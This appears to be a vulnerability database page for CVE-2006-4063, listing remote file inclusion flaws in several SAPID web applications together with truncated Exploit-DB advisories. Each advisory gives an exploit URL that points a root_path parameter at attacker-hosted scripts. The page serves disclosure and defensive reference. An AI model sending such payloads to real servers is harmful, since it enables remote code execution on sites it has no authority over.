CVE-2006-4063
Published 2006-08-10
Priority: P3 42 | Severity: high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available
EPSS: 3.09% (86.1th percentile)
Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| csaba_godor | sapid_blog_beta_2 | — | — |
No detection rules found.
Exploit-DB
SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4063 SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID Blog <= Beta 2 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_infochannel.inc.php?root_path=[evil_scripts]
http://www.s
Exploit-DB
SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4063 SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID Shop <= v.1.2 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidshop_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]
#Pozdro dla wszystk
Exploit-DB
SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4065 SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID Gallery <= v.1 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]
http://www.site.co
Exploit-DB
SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4063 SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidcms_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]
http://www.site.c
No writeups or analysis indexed.